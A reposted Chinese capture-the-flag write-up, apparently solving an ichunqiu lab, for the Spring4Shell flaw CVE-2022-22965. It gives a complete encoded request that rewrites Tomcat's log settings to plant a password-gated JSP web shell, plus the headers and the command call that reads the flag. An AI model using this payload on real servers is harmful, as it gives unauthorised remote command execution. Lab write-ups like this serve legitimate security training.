您的位置:首页 > 财经 > 产业 > CVE-2022-22965

CVE-2022-22965

2025/2/24 10:17:46 来源:https://blog.csdn.net/a666666688/article/details/141097083  浏览:    关键词:CVE-2022-22965

url:

eci-2zebpda4xu6z67w416ef.cloudeci1.ichunqiu.com:8080

访问页面

发包到repeter并修改POC后发包

修改GET头部信息

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1

在尾部添加上一条信息

suffix: %>//
c1: Runtime
c2: <%
DNT: 1

拼接查看flag

/tomcatwar.jsp?pwd=j&cmd=cat%20/flag

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

最新新闻

热搜词

25.04.15 达梦公司介绍 Atcoder ABC268Ex Taboo 题解 [ 紫 ] [ AC 自动机 ] windows的CMD命令提示符 在运维工作中,常用的操作系统有哪些? 判断质数,可以从2到数的算术平方根判断即可,不用2到这个数减1 原因

声明:本站所有新闻及新闻图片来源于其他网站,如有侵权,请及时联系我们!

客户服务 | 关于我们 | 版权声明

版权所有:

Copyright 2024 尧图网 All Rights Reserved.QQ:809451989